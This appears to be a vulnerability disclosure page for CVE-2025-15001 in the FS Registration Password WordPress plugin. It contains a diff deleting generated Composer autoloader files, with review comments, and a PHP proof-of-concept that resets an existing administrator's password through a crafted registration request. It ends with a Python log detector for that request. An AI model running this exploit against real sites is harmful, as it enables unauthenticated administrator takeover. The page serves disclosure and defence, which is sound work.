-            $packages[] = array_keys($installed['versions']);
-        }
-
-        if (1 === count($packages)) {
-            return $packages[0];
-        }
-
-        return array_keys(array_flip(call_user_func_array('array_merge', $packages)));
-    }
-
-    /**
-     * Returns a list of all package names with a specific type e.g. 'library'
-     *
-     * @param  string   $type
-     * @return string[]
-     * @psalm-return list<string>
-     */
-    public static function getInstalledPackagesByType($type)
-    {
-        $packagesByType = array();
-
-        foreach (self::getInstalled() as $installed) {
-            foreach ($installed['versions'] as $name => $package) {
-                if (isset($package['type']) && $package['type'] === $type) {
-                    $packagesByType[] = $name;
-                }
-            }
-        }
-
-        return $packagesByType;
-    }
-
-    /**
-     * Checks whether the given package is installed
-     *
-     * This also returns true if the package name is provided or replaced by another package
-     *
-     * @param  string $packageName
-     * @param  bool   $includeDevRequirements
-     * @return bool
-     */
-    public static function isInstalled($packageName, $includeDevRequirements = true)
-    {
-        foreach (self::getInstalled() as $installed) {
-            if (isset($installed['versions'][$packageName])) {
-                return $includeDevRequirements || empty($installed['versions'][$packageName]['dev_requirement']);
-            }
-        }
-
-        return false;
-    }
-
-    /**
-     * Checks whether the given package satisfies a version constraint
-     *
-     * e.g. If you want to know whether version 2.3+ of package foo/bar is installed, you would call:
-     *
-     *   ComposerInstalledVersions::satisfies(new VersionParser, 'foo/bar', '^2.3')
-     *
-     * @param  VersionParser $parser      Install composer/semver to have access to this class and functionality
-     * @param  string        $packageName
-     * @param  string|null   $constraint  A version constraint to check for, if you pass one you have to make sure composer/semver is required by your package
-     * @return bool
-     */
-    public static function satisfies(VersionParser $parser, $packageName, $constraint)
-    {
-        $constraint = $parser->parseConstraints($constraint);
-        $provided = $parser->parseConstraints(self::getVersionRanges($packageName));
-
-        return $provided->matches($constraint);
-    }
-
-    /**
-     * Returns a version constraint representing all the range(s) which are installed for a given package
-     *
-     * It is easier to use this via isInstalled() with the $constraint argument if you need to check
-     * whether a given version of a package is installed, and not just whether it exists
-     *
-     * @param  string $packageName
-     * @return string Version constraint usable with composer/semver
-     */
-    public static function getVersionRanges($packageName)
-    {
-        foreach (self::getInstalled() as $installed) {
-            if (!isset($installed['versions'][$packageName])) {
-                continue;
-            }
-
-            $ranges = array();
-            if (isset($installed['versions'][$packageName]['pretty_version'])) {
-                $ranges[] = $installed['versions'][$packageName]['pretty_version'];
-            }
-            if (array_key_exists('aliases', $installed['versions'][$packageName])) {
-                $ranges = array_merge($ranges, $installed['versions'][$packageName]['aliases']);
-            }
-            if (array_key_exists('replaced', $installed['versions'][$packageName])) {
-                $ranges = array_merge($ranges, $installed['versions'][$packageName]['replaced']);
-            }
-            if (array_key_exists('provided', $installed['versions'][$packageName])) {
-                $ranges = array_merge($ranges, $installed['versions'][$packageName]['provided']);
-            }
-
-            return implode(' || ', $ranges);
-        }
-
-        throw new OutOfBoundsException('Package "' . $packageName . '" is not installed');
-    }
-
-    /**
-     * @param  string      $packageName
-     * @return string|null If the package is being replaced or provided but is not really installed, null will be returned as version, use satisfies or getVersionRanges if you need to know if a given version is present
-     */
-    public static function getVersion($packageName)
-    {
-        foreach (self::getInstalled() as $installed) {
-            if (!isset($installed['versions'][$packageName])) {
-                continue;
-            }
-
-            if (!isset($installed['versions'][$packageName]['version'])) {
-                return null;
-            }
-
-            return $installed['versions'][$packageName]['version'];
-        }
-
-        throw new OutOfBoundsException('Package "' . $packageName . '" is not installed');
-    }
-
-    /**
-     * @param  string      $packageName
-     * @return string|null If the package is being replaced or provided but is not really installed, null will be returned as version, use satisfies or getVersionRanges if you need to know if a given version is present
-     */
-    public static function getPrettyVersion($packageName)
-    {
-        foreach (self::getInstalled() as $installed) {
-            if (!isset($installed['versions'][$packageName])) {
-                continue;
-            }
-
-            if (!isset($installed['versions'][$packageName]['pretty_version'])) {
-                return null;
-            }
-
-            return $installed['versions'][$packageName]['pretty_version'];
-        }
-
-        throw new OutOfBoundsException('Package "' . $packageName . '" is not installed');
-    }
-
-    /**
-     * @param  string      $packageName
-     * @return string|null If the package is being replaced or provided but is not really installed, null will be returned as reference
-     */
-    public static function getReference($packageName)
-    {
-        foreach (self::getInstalled() as $installed) {
-            if (!isset($installed['versions'][$packageName])) {
-                continue;
-            }
-
-            if (!isset($installed['versions'][$packageName]['reference'])) {
-                return null;
-            }
-
-            return $installed['versions'][$packageName]['reference'];
-        }
-
-        throw new OutOfBoundsException('Package "' . $packageName . '" is not installed');
-    }
-
-    /**
-     * @param  string      $packageName
-     * @return string|null If the package is being replaced or provided but is not really installed, null will be returned as install path. Packages of type metapackages also have a null install path.
-     */
-    public static function getInstallPath($packageName)
-    {
-        foreach (self::getInstalled() as $installed) {
-            if (!isset($installed['versions'][$packageName])) {
-                continue;
-            }
-
-            return isset($installed['versions'][$packageName]['install_path']) ? $installed['versions'][$packageName]['install_path'] : null;
-        }
-
-        throw new OutOfBoundsException('Package "' . $packageName . '" is not installed');
-    }
-
-    /**
-     * @return array
-     * @psalm-return array{name: string, version: string, reference: string, pretty_version: string, aliases: string[], dev: bool, install_path: string}
-     */
-    public static function getRootPackage()
-    {
-        $installed = self::getInstalled();
-
-        return $installed[0]['root'];
-    }
-
-    /**
-     * Returns the raw installed.php data for custom implementations
-     *
-     * @deprecated Use getAllRawData() instead which returns all datasets for all autoloaders present in the process. getRawData only returns the first dataset loaded, which may not be what you expect.
-     * @return array[]
-     * @psalm-return array{root: array{name: string, version: string, reference: string, pretty_version: string, aliases: string[], dev: bool, install_path: string}, versions: array<string, array{dev_requirement: bool, pretty_version?: string, version?: string, aliases?: string[], reference?: string, replaced?: string[], provided?: string[], install_path?: string}>}
-     */
-    public static function getRawData()
-    {
-        @trigger_error('getRawData only returns the first dataset loaded, which may not be what you expect. Use getAllRawData() instead which returns all datasets for all autoloaders present in the process.', E_USER_DEPRECATED);
-
-        if (null === self::$installed) {
-            // only require the installed.php file if this file is loaded from its dumped location,
-            // and not from its source location in the composer/composer package, see https://github.com/composer/composer/issues/9937
-            if (substr(__DIR__, -8, 1) !== 'C') {
-                self::$installed = include __DIR__ . '/installed.php';
-            } else {
-                self::$installed = array();
-            }
-        }
-
-        return self::$installed;
-    }
-
-    /**
-     * Returns the raw data of all installed.php which are currently loaded for custom implementations
-     *
-     * @return array[]
-     * @psalm-return list<array{root: array{name: string, version: string, reference: string, pretty_version: string, aliases: string[], dev: bool, install_path: string}, versions: array<string, array{dev_requirement: bool, pretty_version?: string, version?: string, aliases?: string[], reference?: string, replaced?: string[], provided?: string[], install_path?: string}>}>
-     */
-    public static function getAllRawData()
-    {
-        return self::getInstalled();
-    }
-
-    /**
-     * Lets you reload the static array from another file
-     *
-     * This is only useful for complex integrations in which a project needs to use
-     * this class but then also needs to execute another project's autoloader in process,
-     * and wants to ensure both projects have access to their version of installed.php.
-     *
-     * A typical case would be PHPUnit, where it would need to make sure it reads all
-     * the data it needs from this class, then call reload() with
-     * `require $CWD/vendor/composer/installed.php` (or similar) as input to make sure
-     * the project in which it runs can then also use this class safely, without
-     * interference between PHPUnit's dependencies and the project's dependencies.
-     *
-     * @param  array[] $data A vendor/composer/installed.php data set
-     * @return void
-     *
-     * @psalm-param array{root: array{name: string, version: string, reference: string, pretty_version: string, aliases: string[], dev: bool, install_path: string}, versions: array<string, array{dev_requirement: bool, pretty_version?: string, version?: string, aliases?: string[], reference?: string, replaced?: string[], provided?: string[], install_path?: string}>} $data
-     */
-    public static function reload($data)
-    {
-        self::$installed = $data;
-        self::$installedByVendor = array();
-    }
-
-    /**
-     * @return array[]
-     * @psalm-return list<array{root: array{name: string, version: string, reference: string, pretty_version: string, aliases: string[], dev: bool, install_path: string}, versions: array<string, array{dev_requirement: bool, pretty_version?: string, version?: string, aliases?: string[], reference?: string, replaced?: string[], provided?: string[], install_path?: string}>}>
-     */
-    private static function getInstalled()
-    {
-        if (null === self::$canGetVendors) {
-            self::$canGetVendors = method_exists('ComposerAutoloadClassLoader', 'getRegisteredLoaders');
-        }
-
-        $installed = array();
-
-        if (self::$canGetVendors) {
-            foreach (ClassLoader::getRegisteredLoaders() as $vendorDir => $loader) {
-                if (isset(self::$installedByVendor[$vendorDir])) {
-                    $installed[] = self::$installedByVendor[$vendorDir];
-                } elseif (is_file($vendorDir.'/composer/installed.php')) {
-                    $installed[] = self::$installedByVendor[$vendorDir] = require $vendorDir.'/composer/installed.php';
-                    if (null === self::$installed && strtr($vendorDir.'/composer', '\', '/') === strtr(__DIR__, '\', '/')) {
-                        self::$installed = $installed[count($installed) - 1];
-                    }
-                }
-            }
-        }
-
-        if (null === self::$installed) {
-            // only require the installed.php file if this file is loaded from its dumped location,
-            // and not from its source location in the composer/composer package, see https://github.com/composer/composer/issues/9937
-            if (substr(__DIR__, -8, 1) !== 'C') {
-                self::$installed = require __DIR__ . '/installed.php';
-            } else {
-                self::$installed = array();
-            }
-        }
-        $installed[] = self::$installed;
-
-        return $installed;
-    }
-}
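Review bot: The whole-file removal of `vendor/composer/InstalledVersions.php` (`@@ -1,337 +0,0 @@`) is generated Composer runtime code and should be reviewed as packaging cleanup, separately from the security fix, since nothing in these lines reads request data or handles passwords. Before accepting it, check that no remaining plugin code calls `Composer\InstalledVersions`, and compare the deleted text against the shipped file rather than this rendering, which has lost its namespace separators (`use ComposerAutoloadClassLoader;`, `strtr($vendorDir.'/composer', '\', '/')`).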
--- a/registration-password/vendor/composer/autoload_classmap.php
+++ b/registration-password/vendor/composer/autoload_classmap.php
@@ -1,10 +0,0 @@
-<?php
-
-// autoload_classmap.php @generated by Composer
-
-$vendorDir = dirname(dirname(__FILE__));
-$baseDir = dirname($vendorDir);
-
-return array(
-    'Composer\InstalledVersions' => $vendorDir . '/composer/InstalledVersions.php',
-);
--- a/registration-password/vendor/composer/autoload_namespaces.php
+++ b/registration-password/vendor/composer/autoload_namespaces.php
@@ -1,9 +0,0 @@
-<?php
-
-// autoload_namespaces.php @generated by Composer
-
-$vendorDir = dirname(dirname(__FILE__));
-$baseDir = dirname($vendorDir);
-
-return array(
-);
--- a/registration-password/vendor/composer/autoload_psr4.php
+++ b/registration-password/vendor/composer/autoload_psr4.php
@@ -1,10 +0,0 @@
-<?php
-
-// autoload_psr4.php @generated by Composer
-
-$vendorDir = dirname(dirname(__FILE__));
-$baseDir = dirname($vendorDir);
-
-return array(
-    'Fsylum\RegistrationPassword\' => array($baseDir . '/src'),
-);
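Review bot: Dropping the `'Fsylum\RegistrationPassword\' => array($baseDir . '/src')` entry removes the PSR-4 route to the plugin's own classes under `src/`, and the sibling hunks delete the rest of the Composer loader as well. Confirm that the patched release loads those classes some other way and that no bootstrap file still requires the Composer autoloader, because a missing loader fails at plugin load time, not only on the registration path.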
--- a/registration-password/vendor/composer/autoload_real.php
+++ b/registration-password/vendor/composer/autoload_real.php
@@ -1,55 +0,0 @@
-<?php
-
-// autoload_real.php @generated by Composer
-
-class ComposerAutoloaderInit79e22c08f5c32b16bcd5346f5430b3bc
-{
-    private static $loader;
-
-    public static function loadClassLoader($class)
-    {
-        if ('ComposerAutoloadClassLoader' === $class) {
-            require __DIR__ . '/ClassLoader.php';
-        }
-    }
-
-    /**
-     * @return ComposerAutoloadClassLoader
-     */
-    public static function getLoader()
-    {
-        if (null !== self::$loader) {
-            return self::$loader;
-        }
-
-        spl_autoload_register(array('ComposerAutoloaderInit79e22c08f5c32b16bcd5346f5430b3bc', 'loadClassLoader'), true, true);
-        self::$loader = $loader = new ComposerAutoloadClassLoader(dirname(dirname(__FILE__)));
-        spl_autoload_unregister(array('ComposerAutoloaderInit79e22c08f5c32b16bcd5346f5430b3bc', 'loadClassLoader'));
-
-        $useStaticLoader = PHP_VERSION_ID >= 50600 && !defined('HHVM_VERSION') && (!function_exists('zend_loader_file_encoded') || !zend_loader_file_encoded());
-        if ($useStaticLoader) {
-            require __DIR__ . '/autoload_static.php';
-
-            call_user_func(ComposerAutoloadComposerStaticInit79e22c08f5c32b16bcd5346f5430b3bc::getInitializer($loader));
-        } else {
-            $map = require __DIR__ . '/autoload_namespaces.php';
-            foreach ($map as $namespace => $path) {
-                $loader->set($namespace, $path);
-            }
-
-            $map = require __DIR__ . '/autoload_psr4.php';
-            foreach ($map as $namespace => $path) {
-                $loader->setPsr4($namespace, $path);
-            }
-
-            $classMap = require __DIR__ . '/autoload_classmap.php';
-            if ($classMap) {
-                $loader->addClassMap($classMap);
-            }
-        }
-
-        $loader->register(true);
-
-        return $loader;
-    }
-}
--- a/registration-password/vendor/composer/autoload_static.php
+++ b/registration-password/vendor/composer/autoload_static.php
@@ -1,36 +0,0 @@
-<?php
-
-// autoload_static.php @generated by Composer
-
-namespace ComposerAutoload;
-
-class ComposerStaticInit79e22c08f5c32b16bcd5346f5430b3bc
-{
-    public static $prefixLengthsPsr4 = array (
-        'F' =>
-        array (
-            'Fsylum\RegistrationPassword\' => 28,
-        ),
-    );
-
-    public static $prefixDirsPsr4 = array (
-        'Fsylum\RegistrationPassword\' =>
-        array (
-            0 => __DIR__ . '/../..' . '/src',
-        ),
-    );
-
-    public static $classMap = array (
-        'Composer\InstalledVersions' => __DIR__ . '/..' . '/composer/InstalledVersions.php',
-    );
-
-    public static function getInitializer(ClassLoader $loader)
-    {
-        return Closure::bind(function () use ($loader) {
-            $loader->prefixLengthsPsr4 = ComposerStaticInit79e22c08f5c32b16bcd5346f5430b3bc::$prefixLengthsPsr4;
-            $loader->prefixDirsPsr4 = ComposerStaticInit79e22c08f5c32b16bcd5346f5430b3bc::$prefixDirsPsr4;
-            $loader->classMap = ComposerStaticInit79e22c08f5c32b16bcd5346f5430b3bc::$classMap;
-
-        }, null, ClassLoader::class);
-    }
-}
--- a/registration-password/vendor/composer/installed.php
+++ b/registration-password/vendor/composer/installed.php
@@ -1,23 +0,0 @@
-<?php return array(
-    'root' => array(
-        'pretty_version' => '1.0.1',
-        'version' => '1.0.1.0',
-        'type' => 'library',
-        'install_path' => __DIR__ . '/../../',
-        'aliases' => array(),
-        'reference' => 'e5bbfccb7078f536cb258bc5225fd7892b0b60a5',
-        'name' => '__root__',
-        'dev' => true,
-    ),
-    'versions' => array(
-        '__root__' => array(
-            'pretty_version' => '1.0.1',
-            'version' => '1.0.1.0',
-            'type' => 'library',
-            'install_path' => __DIR__ . '/../../',
-            'aliases' => array(),
-            'reference' => 'e5bbfccb7078f536cb258bc5225fd7892b0b60a5',
-            'dev_requirement' => false,
-        ),
-    ),
-);
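Review bot: The deleted root entry carries `'dev' => true` next to `'pretty_version' => '1.0.1'`, so the 1.0.1 package was dumped from a Composer install with dev mode enabled. If a later release ships a `vendor/` directory again, build it with `composer install --no-dev` and regenerate `installed.php` so it does not keep describing version 1.0.1 at reference `e5bbfccb7078f536cb258bc5225fd7892b0b60a5`.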

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-15001 - FS Registration Password <= 1.0.1 - Unauthenticated Privilege Escalation via Account Takeover

$target_url = 'http://vulnerable-wordpress-site.com';
$victim_username = 'administrator';
$victim_email = 'admin@site.com';
$new_password = 'Hacked123!';

$registration_endpoint = $target_url . '/wp-login.php?action=register';

// Prepare the malicious registration POST data.
// We are attempting to 'register' a user that already exists.
$post_data = [
    'user_login' => $victim_username,
    'user_email' => $victim_email,
    'pass1' => $new_password,
    'pass2' => $new_password,
    'wp-submit' => 'Register',
    // This parameter triggers the vulnerable plugin code.
    'fs_is_password_for_registration' => 'yes'
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $registration_endpoint);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
// The response will contain an error about the user already existing, which is expected.
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code == 200) {
    echo "[*] Request sent. Check if password for '$victim_username' was changed to '$new_password'.\n";
    echo "[*] Attempt login at: " . $target_url . "/wp-login.php\n";
} else {
    echo "[!] Unexpected HTTP status: $http_code\n";
}

?>
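The request shape above can be hunted for in request logs. The following detector is an added example, not part of the original page or Atomic Edge's code; it assumes an audit log in JSON-lines form that records the raw form body (the field names `ts`, `src`, `method`, `url`, `body` and all sample records are constructed) and a defender-supplied list of existing logins and e-mail addresses.

```python
import json
from urllib.parse import parse_qs, urlsplit

TRIGGER_FIELD = "fs_is_password_for_registration"  # plugin parameter named on this page

# Constructed sample records; the JSON-lines layout and field names are assumptions.
SAMPLE_LOG = """\
{"ts":"2026-01-05T10:00:01Z","src":"198.51.100.7","method":"POST","url":"/wp-login.php?action=register","body":"user_login=newreader&user_email=reader%40example.org&pass1=x&pass2=x&fs_is_password_for_registration=yes"}
{"ts":"2026-01-05T10:02:14Z","src":"203.0.113.9","method":"POST","url":"/wp-login.php?action=register","body":"user_login=Administrator&user_email=other%40example.org&pass1=y&pass2=y&wp-submit=Register&fs_is_password_for_registration=yes"}
{"ts":"2026-01-05T10:03:40Z","src":"203.0.113.9","method":"POST","url":"/wp-login.php","body":"log=administrator&pwd=y"}
{"ts":"2026-01-05T10:05:00Z","src":"192.0.2.44","method":"POST","url":"/wp-login.php?action=register","body":"user_login=someone&user_email=Owner%40Example.org&fs_is_password_for_registration=yes&pass1=z"}
not-json garbage line
"""


def _last(values):
    """Last value of a repeated form field, which is the one PHP keeps."""
    return values[-1] if values else ""


def classify(record, known_logins, known_emails):
    """Return None, 'registration' or 'takeover-attempt' for one audit record.

    known_logins / known_emails must already be lower-cased sets.
    """
    if str(record.get("method", "")).upper() != "POST":
        return None
    url = urlsplit(record.get("url") or "")
    if not url.path.endswith("/wp-login.php"):
        return None
    form = parse_qs(record.get("body") or "", keep_blank_values=True)
    # wp-login.php reads 'action' from $_REQUEST, so accept it in query or body.
    action = _last(parse_qs(url.query).get("action")) or _last(form.get("action"))
    if action != "register" or _last(form.get(TRIGGER_FIELD)) != "yes":
        return None
    login = _last(form.get("user_login")).strip().lower()
    email = _last(form.get("user_email")).strip().lower()
    # A registration that names an account which already exists is the signal.
    if login in known_logins or email in known_emails:
        return "takeover-attempt"
    return "registration"


def scan(lines, known_logins, known_emails):
    """Classify every parseable record; submitted passwords are never copied out."""
    logins = {u.lower() for u in known_logins}
    emails = {e.lower() for e in known_emails}
    findings = []
    for number, line in enumerate(lines, 1):
        try:
            record = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip blank or malformed lines
        if not isinstance(record, dict):
            continue
        verdict = classify(record, logins, emails)
        if verdict:
            findings.append({"line": number, "ts": record.get("ts"),
                             "src": record.get("src"), "verdict": verdict})
    return findings


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG.splitlines(), {"administrator"}, {"owner@example.org"}):
        print(hit)
```

Records classified as `takeover-attempt` warrant a review of the named account's recent logins and a forced password reset; plain `registration` hits only confirm that the plugin's form is in use.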
